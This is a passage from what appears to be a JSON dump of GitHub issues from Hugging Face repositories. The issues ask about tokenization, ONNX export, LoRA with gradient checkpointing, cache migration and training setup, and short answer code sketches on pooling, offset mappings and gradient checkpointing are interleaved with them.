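On the Llama sentence-embedding question above (transformers#27600): with `padding_side = "left"`, taking `hidden_states[:, -1, :]` is safe because the last position is always a real token, but a plain `.mean(dim=1)` averages padding positions in. A sketch of mask-aware mean pooling that drops into the question's loop (`model` and `inputs` as defined there):

```python
import torch

def masked_mean_pool(hidden_states, attention_mask):
    """Mean over real tokens only: hidden_states (B, T, D), attention_mask (B, T)."""
    mask = attention_mask.unsqueeze(-1).type_as(hidden_states)  # (B, T, 1)
    summed = (hidden_states * mask).sum(dim=1)                  # pads contribute 0
    counts = mask.sum(dim=1).clamp(min=1e-9)                    # real-token counts
    return summed / counts

with torch.no_grad():
    outputs = model(**inputs, output_hidden_states=True)

sentence_embeddings = masked_mean_pool(
    outputs.hidden_states[-1], inputs["attention_mask"]
)
```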
But maybe I am doing something wrong.\r\n\r\nBy the way, I'm using TypeScript and I was following the [docs for this model](https://huggingface.co/docs/transformers.js/api/pipelines#module_pipelines.QuestionAnsweringPipeline).\r\n\r\n## Code\r\n\r\n```ts\r\n/** THIS CODE IS WRAPPED BY AN ASYNC FUNCTION */\r\n\r\nconst { pipeline } = await import(\"@xenova/transformers\");\r\n\r\nconst answerer = await pipeline(\r\n \"question-answering\",\r\n \"Xenova/distilbert-base-uncased-distilled-squad\"\r\n);\r\n\r\nconst results = await answerer(\r\n \"Who is Dominic Toretto?\",\r\n \"Dominic Toretto is part of the family.\"\r\n);\r\n```\r\n\r\n## Error\r\n\r\nTypeError: A float32 tensor's data must be type of function Float32Array()\r\n\r\n![image](https://github.com/xenova/transformers.js/assets/53703706/a248457f-e47a-4f42-8604-622bf8fe49ed)\r\n\r\n![image](https://github.com/xenova/transformers.js/assets/53703706/a9f50b80-c9d6-4a83-aea7-908afd684759)\r\n\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/401", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-18T12:58:50Z", "updated_at": "2023-11-19T12:44:00Z", "user": "AyresMonteiro" }, { "repo": "huggingface/transformers.js", "number": 399, "title": "[Question] Is it possible to encode and decode with `AutoTokenizer.from_pretrained` and keep spaces?", "body": "I'm trying to build a pure JS online tokenizer, visually similar to https://github.com/1rgs/tokenwiz (but without the Python backend)\r\n\r\nI'm doing something like:\r\n\r\n```js\r\nconst model = await AutoTokenizer.from_pretrained('mistralai/Mistral-7B-v0.1')\r\nconst textInput = `[INST] <>\r\nYou are a friendly Llama.\r\n<>\r\n\r\nDo you spit at people? [/INST]`\r\nconst tokens = model.encode(textInput)\r\nconst tokenizedText = model.batch_decode(\r\n tokens.map((token) => [token]),\r\n { clean_up_tokenization_spaces: false }\r\n)\r\nconsole.log(tokenizedText)\r\n```\r\n\r\nAnd get:\r\n\r\n```js\r\n0: \"\"\r\n1: \"[\"\r\n2: \"INST\"\r\n3: \"]\"\r\n4: \"<<\"\r\n5: \"SYS\"\r\n6: \">>\"\r\n7: \"\\n\"\r\n8: \"You\"\r\n9: \"are\"\r\n10: \"a\"\r\n11: \"friendly\"\r\n12: \"L\"\r\n13: \"l\"\r\n14: \"ama\"\r\n15: \".\"\r\n16: \"\\n\"\r\n17: \"<\"\r\n18: \">\"\r\n21: \"\\n\"\r\n22: \"\\n\"\r\n23: \"Do\"\r\n24: \"you\"\r\n25: \"sp\"\r\n26: \"it\"\r\n27: \"at\"\r\n28: \"people\"\r\n29: \"?\"\r\n30: \"[\"\r\n31: \"/\"\r\n32: \"INST\"\r\n33: \"]\"\r\n```\r\n\r\nSo while newlines are there, all the spaces are gone. Is there any way to get the original text back but with token boundaries for visualisation?", "url": "https://github.com/huggingface/transformers.js/issues/399", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-17T18:46:05Z", "updated_at": "2023-11-17T20:18:02Z", "user": "daaain" }, { "repo": "huggingface/alignment-handbook", "number": 39, "title": "Why zephyr-7b-dpo-lora is finetuned from mistralai/Mistral-7B-v0.1 instead of zepher-7b-sft model?", "body": "There is a misalignment between zephyr-7b-dpo-lora and zephyr-7b-dpo-full.\r\nThe former one is finetuned from mistralai/Mistral-7B-v0.1.\r\nThe latter is finetuned from zephyr-7b-dpo-full.\r\n\r\nI wonder what causes this misalignment ?\r\n\r\nAlso, have you benchmarked performance improvement of the lora finetunning script? In my experiment, lora finetunning seems do not provide any performance improvement compared with the base model on MT-bench. I think maybe some parameters are incorrect. 
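On the token-boundary visualisation question above (transformers.js#399): the general fix is to slice the original string with offset mappings rather than decoding tokens one by one, which is what loses the spaces. A Python sketch of the technique (the same idea, not the transformers.js API itself):

```python
from transformers import AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained("mistralai/Mistral-7B-v0.1")
text = "Do you spit at people?"

enc = tokenizer(text, return_offsets_mapping=True, add_special_tokens=False)
# Slice the source text, so whitespace survives exactly as typed.
pieces = [text[start:end] for start, end in enc["offset_mapping"]]
print(pieces)  # e.g. ['Do', ' you', ' sp', 'it', ' at', ' people', '?']
```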
", "url": "https://github.com/huggingface/alignment-handbook/issues/39", "state": "open", "labels": [], "created_at": "2023-11-17T18:11:59Z", "updated_at": "2024-03-21T19:18:08Z", "comments": 2, "user": "ChenDRAG" }, { "repo": "huggingface/optimum", "number": 1545, "title": "Add support to export facebook encodec models to ONNX", "body": "### Feature request\n\nWhen I try to use optimum-cli to export the facebook/encodec_32khz model I get this error:\r\n```\r\n% optimum-cli export onnx --model facebook/encodec_32khz encodec.onnx\r\nFramework not specified. Using pt to export to ONNX.\r\n/Users/micchig/micromamba/envs/music-representation/lib/python3.11/site-packages/torch/nn/utils/weight_norm.py:30: UserWarning: torch.nn.utils.weight_norm is deprecated in favor of torch.nn.utils.parametrizations.weight_norm.\r\n warnings.warn(\"torch.nn.utils.weight_norm is deprecated in favor of torch.nn.utils.parametrizations.weight_norm.\")\r\nTraceback (most recent call last):\r\n File \"/Users/micchig/micromamba/envs/music-representation/bin/optimum-cli\", line 10, in \r\n sys.exit(main())\r\n ^^^^^^\r\n File \"/Users/micchig/micromamba/envs/music-representation/lib/python3.11/site-packages/optimum/commands/optimum_cli.py\", line 163, in main\r\n service.run()\r\n File \"/Users/micchig/micromamba/envs/music-representation/lib/python3.11/site-packages/optimum/commands/export/onnx.py\", line 246, in run\r\n main_export(\r\n File \"/Users/micchig/micromamba/envs/music-representation/lib/python3.11/site-packages/optimum/exporters/onnx/__main__.py\", line 408, in main_export\r\n raise ValueError(\r\nValueError: Trying to export a encodec model, that is a custom or unsupported architecture for the task feature-extraction, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type encodec to be supported natively in the ONNX export.\r\n```\r\nI am following the advice in the message and opening an issue here. 
:)\n\n### Motivation\n\nI want to use the encodec model for inference and I'd much rather use ONNX than importing the pretrained model from transformers every time and run it in pytorch as ONNX is much faster.\n\n### Your contribution\n\nI'm afraid I can't contribute to this personally", "url": "https://github.com/huggingface/optimum/issues/1545", "state": "open", "labels": [ "feature-request", "onnx" ], "created_at": "2023-11-17T11:16:01Z", "updated_at": "2025-12-12T06:23:33Z", "comments": 6, "user": "giamic" }, { "repo": "huggingface/peft", "number": 1142, "title": "How to do Gradient Checkpoint + LoRA", "body": "### System Info\r\n\r\n\"image\"\r\n\r\n### Who can help?\r\n\r\nI need help with using LoRA + gradient checkpointing.\r\nUsing the reentrant option appears to be the solution, but it slows down training a lot, for LLama-7b it's more than 2x the training time of a full fine-tune on the same hardware (A100).\r\n\"image\"\r\n\r\nWe should be able to just use vanilla gradient checkpoint.\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\n```python\r\nimport torch\r\nfrom transformers import AutoModelForCausalLM\r\nfrom peft import LoraConfig, get_peft_model\r\n\r\n# model_id, vocab = 'meta-llama/Llama-2-7b-hf', 32000\r\nmodel_id, vocab = \"stas/tiny-random-llama-2\", 3000\r\n\r\nseq_len = 1024\r\nbs=8\r\nuse_lora=True\r\n\r\nmodel_config = dict(\r\n pretrained_model_name_or_path=model_id,\r\n device_map=0,\r\n trust_remote_code=True,\r\n low_cpu_mem_usage=True,\r\n torch_dtype=torch.bfloat16,\r\n use_cache=False,\r\n)\r\n\r\nmodel = AutoModelForCausalLM.from_pretrained(**model_config)\r\n\r\n# Just freeze embeddings for small memory decrease\r\nmodel.model.embed_tokens.weight.requires_grad_(False);\r\n\r\nif use_lora:\r\n lora_config = LoraConfig(\r\n r=2, # the rank of the LoRA matrices\r\n lora_alpha=16, # the weight\r\n lora_dropout=0.1, # dropout to add to the LoRA layers\r\n bias=\"none\", # add bias to the nn.Linear layers?\r\n task_type=\"CAUSAL_LM\",\r\n target_modules=[\"q_proj\", \"k_proj\",\"v_proj\",\"o_proj\"], # the name of the layers to add LoRA\r\n )\r\n \r\n model = get_peft_model(model, lora_config)\r\n\r\nexample = {\"input_ids\": torch.randint(0, vocab, size=(bs,seq_len), device=\"cuda:0\"), \r\n \"labels\":torch.randint(0, vocab, size=(bs,seq_len), device=\"cuda:0\")}\r\n\r\nimport torch, peft, accelerate, transformers\r\nfor lib in [torch, peft, accelerate, transformers]:\r\n print(f\"{lib.__name__}: {lib.__version__}\")\r\n\r\nmodel.train()\r\ndef call_forward():\r\n with torch.amp.autocast(\"cuda\", dtype=torch.bfloat16):\r\n out = model(**example)\r\n loss = out.loss\r\n return loss\r\n\r\n%timeit loss=call_forward()\r\nloss=call_forward()\r\nloss.requires_grad\r\n# 5.48 ms \u00b1 31.1 \u00b5s per loop (mean \u00b1 std. dev. of 7 runs, 100 loops each)\r\n# True\r\n\r\nmodel.gradient_checkpointing_enable()\r\n%timeit loss=call_forward()\r\nloss=call_forward()\r\nloss.requires_grad\r\n# 5.13 ms \u00b1 33.6 \u00b5s per loop (mean \u00b1 std. dev. of 7 runs, 100 loops each)\r\n# False\r\n\r\nmodel.gradient_checkpointing_enable(dict(use_reentrant=False))\r\n%timeit loss=call_forward()\r\nloss=call_forward()\r\nloss.requires_grad\r\n# 7.23 ms \u00b1 40.1 \u00b5s per loop (mean \u00b1 std. dev. 
of 7 runs, 100 loops each)\r\n# True\r\n```\r\n\r\n### Expected behavior\r\n\r\nNothing to add here.", "url": "https://github.com/huggingface/peft/issues/1142", "state": "closed", "labels": [], "created_at": "2023-11-17T09:34:16Z", "updated_at": "2025-10-06T10:22:58Z", "user": "tcapelle" }, { "repo": "huggingface/accelerate", "number": 2164, "title": "how to get same timestamp in different subprocesses while using accelerate launch", "body": "I would like to get a unique timestamp to name my result folder like below \r\n```\r\ndef get_time_string() -> str:\r\n x = datetime.datetime.now()\r\n return f\"{(x.year - 2000):02d}{x.month:02d}{x.day:02d}-{x.hour:02d}{x.minute:02d}{x.second:02d}\"\r\n```\r\n, however, it sometimes will get a different timestamp in different subprocesses, is there anyway to get a unique timestamp?\r\nThanks very much for your time!", "url": "https://github.com/huggingface/accelerate/issues/2164", "state": "closed", "labels": [], "created_at": "2023-11-17T06:36:00Z", "updated_at": "2023-11-29T07:30:04Z", "user": "shliu0" }, { "repo": "huggingface/open_asr_leaderboard", "number": 14, "title": "How to run calc_rtf.py? Cannot reproduce rtf results.", "body": "There is no guide on how to execute calc_rtf.py. For example, this one https://github.com/huggingface/open_asr_leaderboard/blob/main/transformers/calc_rtf.py references 4469669.mp3. But there is no such file in the repo from what I see.\r\n\r\nSo the results are not reproducible.\r\n\r\nSame for https://github.com/huggingface/open_asr_leaderboard/blob/main/nemo_asr/calc_rtf.py What is /disk3/datasets/speech-datasets/earnings22/media/4469669.wav?\r\n\r\nBTW, I don't recommend simply copying the same sample multiple times for an evaluation. It can cause performance that looks too good compared to running in production. While the data won't be cached, the same chunks of external language models will get hit multiple times, giving better-than-reality results, as one example. What that means is that, for example, the whisper models are never diverging across elements in the batch in the sequence they are producing. This can cause the embedding lookup to be better than it really should be.\r\n\r\nI got my RTFx results in https://arxiv.org/abs/2311.04996 by cahcing the entire dataset in memory https://github.com/nvidia-riva/riva-asrlib-decoder/blob/8282368816552a7ee22c9340dce7b9c3c8d1f193/src/riva/asrlib/decoder/test_graph_construction.py#L77-L89 This is what we do at MLPerf Inference benchmarks as well. Which is the gold standard for benchmarking.", "url": "https://github.com/huggingface/open_asr_leaderboard/issues/14", "state": "open", "labels": [], "created_at": "2023-11-16T21:14:31Z", "updated_at": "2023-11-16T21:14:31Z", "user": "galv" }, { "repo": "huggingface/transformers.js", "number": 397, "title": "[Question] Tokenizing a base64 for string is very slow?", "body": "Hi! I happened to be encoding some files using transformers.js and one of the files happened to have some base64 in it. What I noticed is that base64 takes an enormously long time, relative to the number of tokens produced. Tokenizing a string of english text to the same number of tokens is far quicker. 
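On the gradient-checkpointing timings above (peft#1142): the fast reentrant path only "breaks" (`loss.requires_grad == False`) because, with the embeddings frozen, no checkpointed input requires grad. Hooking the embedding outputs restores gradient flow while keeping the cheaper reentrant variant; a sketch against the script above:

```python
model.gradient_checkpointing_enable()  # default reentrant variant (the fast one)
model.enable_input_require_grads()     # make embedding outputs require grad

loss = call_forward()
print(loss.requires_grad)  # True, without paying for use_reentrant=False
```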
\r\nFor example:\r\n```javascript\r\nconst testBase64 =\r\n \"VGhlIFNwYW5pc2ggQ2l2aWwgV2FyIChTcGFuaXNoOiBHdWVycmEgQ2l2aWwgRXNwYcOxb2xhKVtub3RlIDJdIHdhcyBmb3VnaHQgZnJvbSAxOTM2IHRvIDE5MzkgYmV0d2VlbiB0aGUgUmVwdWJsaWNhbnMgYW5kIHRoZSBOYXRpb25hbGlzdHMuIFJlcHVibGljYW5zIHdlcmUgbG95YWwgdG8gdGhlIGxlZnQtbGVhbmluZyBQb3B1bGFyIEZyb250IGdvdmVybm1lbnQgb2YgdGhlIFNlY29uZCBTcGFuaXNoIFJlcHVibGljLCBhbmQgY29uc2lzdGVkIG9mIHZhcmlvdXMgc29jaWFsaXN0LCBjb21tdW5pc3QsIHNlcGFyYXRpc3QsIGFuYXJjaGlzdCwgYW5kIHJlcHVibGljYW4gcGFydGllcywgc29tZSBvZiB3aGljaCBoYWQgb3Bwb3NlZCB0aGUgZ292ZXJubWVudCBpbiB0aGUgcHJlLXdhciBwZXJpb2QuWzEyXSBUaGUgb3Bwb3NpbmcgTmF0aW9uYWxpc3RzIHdlcmUgYW4gYWxsaWFuY2Ugb2YgRmFsYW5naXN0cywgbW9uYXJjaGlzdHMsIGNvbnNlcnZhdGl2ZXMsIGFuZCB0cmFkaXRpb25hbGlzdHMgbGVkIGJ5IGEgbWlsaXRhcnkganVudGEgYW1vbmcgd2hvbSBHZW5lcmFsIEZyYW5jaXNjbyBGcmFuY28gcXVpY2tseSBhY2hpZXZlZCBhIHByZXBvbmRlcmFudCByb2xlLiBEdWUgdG8gdGhlIGludGVybmF0aW9uYWwgcG9saXRpY2FsIGNsaW1hdGUgYXQgdGhlIHRpbWUsIHRoZSB3YXIgaGFkIG1hbnkgZmFjZXRzIGFuZCB3YXMgdmFyaW91c2x5IHZpZXdlZCBhcyBjbGFzcyBzdHJ1Z2dsZSwgYSByZWxpZ2lvdXMgc3RydWdnbGUsIGEgc3RydWdnbGUgYmV0d2VlbiBkaWN0YXRvcnNoaXAgYW5kIHJlcHVibGljYW4gZGVtb2NyYWN5LCBiZXR3ZWVuIHJldm9sdXRpb24gYW5kIGNvdW50ZXJyZXZvbHV0aW9uLCBhbmQgYmV0d2VlbiBmYXNjaXNtIGFuZCBjb21tdW5pc20uWzEzXSBBY2NvcmRpbmcgdG8gQ2xhdWRlIEJvd2VycywgVS5TLiBhbWJhc3NhZG9yIHRvIFNwYWluIGR1cmluZyB0aGUgd2FyLCBpdCB3YXMgdGhlICJkcmVzcyByZWhlYXJzYWwiIGZvciBXb3JsZCBXYXIgSUkuWzE0XSBUaGUgTmF0aW9uYWxpc3RzIHdvbiB0aGUgd2FyLCB3aGljaCBlbmRlZCBpbiBlYXJseSAxOTM5LCBhbmQgcnVsZWQgU3BhaW4gdW50aWwgRnJhbmNvJ3MgZGVhdGggaW4gTm92ZW1iZXIgMTk3NS4KClRoZSB3YXIgYmVnYW4gYWZ0ZXIgdGhlIHBhcnRpYWwgZmFpbHVyZSBvZiB0aGUgY291cCBkJ8OpdGF0IG9mIEp1bHkgMTkzNiBhZ2FpbnN0IHRoZSBSZXB1YmxpY2FuIGdvdmVybm1lbnQgYnkgYSBncm91cCBvZiBnZW5lcmFscyBvZiB0aGUgU3BhbmlzaCBSZXB1YmxpY2FuIEFybWVkIEZvcmNlcywgd2l0aCBHZW5lcmFsIEVtaWxpbyBNb2xhIGFzIHRoZSBwcmltYXJ5IHBsYW5uZXIgYW5kIGxlYWRlciBhbmQgaGF2aW5nIEdlbmVyYWwgSm9zw6kgU2FuanVyam8gYXMgYSBmaWd1cmVoZWFkLiBUaGUgZ292ZXJubWVudCBhdCB0aGUgdGltZSB3YXMgYSBjb2FsaXRpb24gb2YgUmVwdWJsaWNhbnMsIHN1cHBvcnRlZCBpbiB0aGUgQ29ydGVzIGJ5IGNvbW11bmlzdCBhbmQgc29jaWFsaXN0IHBhcnRpZXMsIHVuZGVyIHRoZSBsZWFkZXJzaGlwIG9mIGNlbnRyZS1sZWZ0IFByZXNpZGVudCBNYW51ZWwgQXphw7FhLlsxNV1bMTZdIFRoZSBOYXRpb25hbGlzdCBmYWN0aW9uIHdhcyBzdXBwb3J0ZWQgYnkgYSBudW1iZXIgb2YgY29uc2VydmF0aXZlIGdyb3VwcywgaW5jbHVkaW5nIENFREEsIG1vbmFyY2hpc3RzLCBpbmNsdWRpbmcgYm90aCB0aGUgb3Bwb3NpbmcgQWxmb25zaXN0cyBhbmQgdGhlIHJlbGlnaW91cyBjb25zZXJ2YXRpdmUgQ2FybGlzdHMsIGFuZCB0aGUgRmFsYW5nZSBFc3Bhw7FvbGEgZGUgbGFzIEpPTlMsIGEgZmFzY2lzdCBwb2xpdGljYWwgcGFydHkuWzE3XSBBZnRlciB0aGUgZGVhdGhzIG9mIFNhbmp1cmpvLCBFbWlsaW8gTW9sYSBhbmQgTWFudWVsIEdvZGVkIExsb3BpcywgRnJhbmNvIGVtZXJnZWQgYXMgdGhlIHJlbWFpbmluZyBsZWFkZXIgb2YgdGhlIE5hdGlvbmFsaXN0IHNpZGUuCgpUaGUgY291cCB3YXMgc3VwcG9ydGVkIGJ5IG1pbGl0YXJ5IHVuaXRzIGluIE1vcm9jY28sIFBhbXBsb25hLCBCdXJnb3MsIFphcmFnb3phLCBWYWxsYWRvbGlkLCBDw6FkaXosIEPDs3Jkb2JhLCBhbmQgU2V2aWxsZS4gSG93ZXZlciwgcmViZWxsaW5nIHVuaXRzIGluIGFsbW9zdCBhbGwgaW1wb3J0YW50IGNpdGllc+KAlHN1Y2ggYXMgTWFkcmlkLCBCYXJjZWxvbmEsIFZhbGVuY2lhLCBCaWxiYW8sIGFuZCBNw6FsYWdh4oCUZGlkIG5vdCBnYWluIGNvbnRyb2wsIGFuZCB0aG9zZSBjaXRpZXMgcmVtYWluZWQgdW5kZXIgdGhlIGNvbnRyb2wgb2YgdGhlIGdvdmVybm1lbnQuIFRoaXMgbGVmdCBTcGFpbiBtaWxpdGFyaWx5IGFuZCBwb2xpdGljYWxseSBkaXZpZGVkLiBUaGUgTmF0aW9uYWxpc3RzIGFuZCB0aGUgUmVwdWJsaWNhbiBnb3Zlcm5tZW50IGZvdWdodCBmb3IgY29udHJvbCBvZiB0aGUgY291bnRyeS4gVGhlIE5hdGlvbmFsaXN0IGZvcmNlcyByZWNlaXZlZCBtdW5pdGlvbnMsIHNvbGRpZXJzLCBhbmQgYWlyIHN1cHBvcnQgZnJvbSBGYXNjaXN0IEl0YWx5LCBOYXppIEdlcm1hbnkgYW5kIFBvcnR1Z2FsLCB3aGlsZSB0aGUgUmVwdWJsaWNhbiBzaWRlIHJlY2VpdmVkIHN1cHBvcnQgZnJvbSB0aGUgU292aWV0IFVuaW9uIGFuZ
CBNZXhpY28uIE90aGVyIGNvdW50cmllcywgc3VjaCBhcyB0aGUgVW5pdGVkIEtpbmdkb20sIEZyYW5jZSwgYW5kIHRoZSBVbml0ZWQgU3RhdGVzLCBjb250aW51ZWQgdG8gcmVjb2duaXNlIHRoZSBSZXB1YmxpY2FuIGdvdmVybm1lbnQgYnV0IGZvbGxvd2VkIGFuIG9mZmljaWFsIHBvbGljeSBvZiBub24taW50ZXJ2ZW50aW9uLiBEZXNwaXRlIHRoaXMgcG9saWN5LCB0ZW5zIG9mIHRob3VzYW5kcyBvZiBjaXRpemVucyBmcm9tIG5vbi1pbnRlcnZlbnRpb25pc3QgY291bnRyaWVzIGRpcmVjdGx5IHBhcnRpY2lwYXRlZCBpbiB0aGUgY29uZmxpY3QuIFRoZXkgZm91Z2h0IG1vc3RseSBpbiB0aGUgcHJvLVJlcHVibGljYW4gSW50ZXJuYXRpb25hbCBCcmlnYWRlcywgd2hpY2ggYWxzbyBpbmNsdWRlZCBzZXZlcmFsIHRob3VzYW5kIGV4aWxlcyBmcm9tIHByby1OYXRpb25hbGlzdCByZWdpbWVzLg==\";\r\n\r\n const { AutoTokenizer } = await import(\"@xenova/transformers\");\r\nconst tokenizer = await AutoTokenizer.from_pretrained(\r\n \"Xenova/all-MiniLM-L6-v2\"\r\n );\r\nconst startTime = Date.now();\r\nconst tokenized = tokenizer.encode(testBase64);\r\nconst endTime = Date.now();\r\nconsole.log(\"It took \", endTime - startTime, \"ms to tokenize\");\r\nconst decoded = tokenizer.decode(tokenized);\r\nconsole.log(\"Decoded: \", decoded);\r\n```\r\n\r\nTakes 56 seconds to tokenize and when decoded returns the same input string.\r\n\r\nInterestingly, similar logic ", "url": "https://github.com/huggingface/transformers.js/issues/397", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-16T20:27:51Z", "updated_at": "2023-11-17T19:48:57Z", "user": "samlhuillier" }, { "repo": "huggingface/transformers.js", "number": 396, "title": "[Question] How to use transformer.js in langchain", "body": "Hi all, I'm writing a custom LLM to use transformer.js with langchain. Does a structure like this make sense? Any advice for optimizing it or best practices to apply? \r\n\r\nAny suggestions or feedback would be greatly appreciated \ud83d\ude0a \ud83d\ude80\r\n\r\n```\r\nimport { pipeline } from \"@xenova/transformers\";\r\nimport { LLM } from \"langchain/llms/base\";\r\n\r\nclass MyHF extends LLM {\r\n static instance = null;\r\n\r\n constructor(modelTask = \"text2text-generation\", modelName = \"Xenova/LaMini-Flan-T5-783M\") {\r\n super({ maxConcurrency: 1 });\r\n this.modelTask = modelTask;\r\n this.modelName = modelName;\r\n this.llmModel = MyHF.getInstance(this.modelTask, this.modelName);\r\n }\r\n\r\n static async getInstance(modelTask, modelName, progress_callback = null) {\r\n if (this.instance === null) {\r\n this.instance = pipeline(modelTask, modelName, { progress_callback });\r\n }\r\n return this.instance;\r\n }\r\n\r\n _llmType() {\r\n return \"hf\";\r\n }\r\n\r\n async _call(prompt, options = { topk: 1 }) {\r\n const executor = await MyHF.getInstance(this.modelTask, this.modelName);\r\n const { generated_text } = await executor(prompt, options);\r\n return generated_text\r\n }\r\n}\r\n\r\nexport default MyHF;\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/396", "state": "open", "labels": [ "question" ], "created_at": "2023-11-16T17:27:52Z", "updated_at": "2023-12-21T16:27:28Z", "user": "mrddter" }, { "repo": "huggingface/autotrain-advanced", "number": 349, "title": "How to reload the checkpoints for LLM finetuning?", "body": "May I ask how to resume from the latest checkpoint using `autotrain llm` if it crashed. I only found one from the `dreambooth` trainers, but I cannot find the `resume_from_checkpoint` anywhere else. \r\n\r\nI was wondering if it has currently not fully supported this feature yet or I was missing something? 
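For background on the checkpoint-resume question above (autotrain-advanced#349): the underlying transformers `Trainer` does support resuming; whether and how `autotrain llm` exposes the flag is exactly what the issue asks, so treat this as context rather than an answer. Assuming a configured `trainer`:

```python
# Resume from the most recent checkpoint-* directory under output_dir:
trainer.train(resume_from_checkpoint=True)

# Or resume from a specific checkpoint:
trainer.train(resume_from_checkpoint="output/checkpoint-500")
```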
It would be super helpful if anyone can kindly pointing out how to do that using autotrain?\r\n\r\nMany thanks!", "url": "https://github.com/huggingface/autotrain-advanced/issues/349", "state": "closed", "labels": [ "stale" ], "created_at": "2023-11-16T11:51:25Z", "updated_at": "2024-02-02T08:58:47Z", "user": "xihajun" }, { "repo": "huggingface/trl", "number": 1004, "title": "Guidance on how to fix the scheduler and ConstantLengthDataset", "body": "Hello,\r\n\r\nI want to fix the issue related to the `ConstantLengthDataset` not knowing the dataset's length in advance.\r\n\r\nBesides having a broken progressbar and a wrong epoch count, the only problem I see is related to the scheduler, as most of us are training using cosine with warmup; if we want a complete cycle, the scheduler needs the total number of steps to adjust the ratios accordingly.\r\n\r\nOne solution would be to \"guess\" how many batches/iteration of packed data we will see by grabbing some samples and estimating the total length. A function tries to do something like this by computing a char/tok ratio.\r\n\r\nDo you have any advice so I can draft a PR?\r\n\r\nOhh I just saw that @lvwerra has a [PR](https://github.com/huggingface/trl/pull/979) in the works, but only for \"finite\" dataset.\r\n", "url": "https://github.com/huggingface/trl/issues/1004", "state": "closed", "labels": [], "created_at": "2023-11-16T10:58:30Z", "updated_at": "2024-01-05T15:05:18Z", "user": "tcapelle" }, { "repo": "huggingface/diffusers", "number": 5816, "title": "low attention to prompt in SDXL", "body": "Hi, \r\nOne of the difference between DALLE3 and SDXL is that SDXL pay less attention to prompt,\r\nIs there a way to solve this problem? I don't Know. for example changing the text encoder to other can help to solve this problem ? \r\nThanks \r\n", "url": "https://github.com/huggingface/diffusers/issues/5816", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2023-11-16T07:24:15Z", "updated_at": "2024-01-09T15:06:55Z", "user": "saeedkhanehgir" }, { "repo": "huggingface/transformers", "number": 27526, "title": "How to preupgrade transformer cache and build the upgraded into docker image?", "body": "### System Info\r\n\r\nLinux ubuntu 22.04\r\nDocker 24.05\r\n\r\nI am not sure if this is the right place for this issue. Apology if it isn't and please direct me to the right place.\r\n\r\nI have been using transformer in docker images that are deployed at runpod/replicate. The containers of the images could go cold and be relaunched again and again. Each time the container would waste 20 to 40 seconds for the blow cache upgrade.\r\n\r\n```\r\nThe cache for model files in Transformers v4.22.0 has been updated. Migrating your old cache. This is a one-time only operation. 
You can interrupt this and resume the migration later on by calling `transformers.utils.move_cache()`.\r\n```\r\n\r\nIt would take around 20 to 40 seconds, which is a significant waste of our GPU time and container startup time.\r\n\r\nI have tried to find out how to pre-upgrade the cache and build the upgraded cache into the docker image by googling, but I couldn't find a way to do it.\r\n\r\nPlease advise how to pre-upgrade the cache and build the upgraded cache into the docker image.\r\n\r\nMany thanks.\r\n\r\n### Expected behavior\r\n\r\nThe cache for model files is pre-upgraded and built into the container image to avoid the upgrade each time a container is launched.\r\n\r\n", "url": "https://github.com/huggingface/transformers/issues/27526", "state": "closed", "labels": [], "created_at": "2023-11-16T02:53:54Z", "updated_at": "2023-12-24T08:03:44Z", "user": "lanyusan" }, { "repo": "huggingface/optimum", "number": 1538, "title": "Does Optimum support AMD GPUs?", "body": "### Feature request\n\nOnnxruntime supports AMD ROCm; how do we compile this in optimum?\n\n### Motivation\n\nOur company is currently testing AMD GPUs and has learned that optimum can accelerate inference on CUDA. We are not sure if it will support ROCm in the future.\n\n### Your contribution\n\nnone", "url": "https://github.com/huggingface/optimum/issues/1538", "state": "closed", "labels": [], "created_at": "2023-11-15T04:15:21Z", "updated_at": "2024-01-09T16:10:39Z", "comments": 1, "user": "taikai-zz" }, { "repo": "huggingface/tokenizers", "number": 1391, "title": "How to split special tokens in encode?", "body": "I have converted a slow tokenizer into a PreTrainedTokenizerFast and got a tokenizer.json file. But I found that this tokenizer did not split special tokens. Here is my add_special_tokens call for tokenizer.json:\r\n` tokenizer.add_special_tokens(\r\n [\r\n AddedToken(\"[gMASK]\", normalized=True, single_word=False),\r\n AddedToken(\"sop\", normalized=True, single_word=False),\r\n ]\r\n )\r\n`\r\n ", "url": "https://github.com/huggingface/tokenizers/issues/1391", "state": "closed", "labels": [], "created_at": "2023-11-15T03:41:22Z", "updated_at": "2024-01-04T06:26:38Z", "user": "leizhao1234" }, { "repo": "huggingface/diffusers", "number": 5786, "title": "How to load a precomputed dataset in the cache folder on a different machine?", "body": "**Is your feature request related to a problem? Please describe.**\r\n\r\nSome slurm clusters may have a limit on time allocation, so I'd like to precompute the dataset on my local machine and then move it to a location on the cluster to reuse it directly.\r\n\r\n**Describe the solution you'd like**\r\n\r\nI saw that load_dataset automatically creates arrow files inside ~/.cache/imagefolder, and the dataset folder path is translated into some hash code. So I hope I can copy the dataset there and pass it to --dataset_name when training the SDXL unet. Or perhaps there are ways I'm not aware of to let me reuse the precomputed cached dataset on a different machine.\r\n\r\n**Describe alternatives you've considered**\r\nplease see above.\r\n\r\n\r\n**Additional context**\r\n please see above", "url": "https://github.com/huggingface/diffusers/issues/5786", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2023-11-14T02:26:00Z", "updated_at": "2024-01-09T15:07:14Z", "user": "linnanwang" }, { "repo": "huggingface/alignment-handbook", "number": 22, "title": "How to perform full parameter finetuning without A100 GPUs", "body": "Hi, thank you for your great work! 
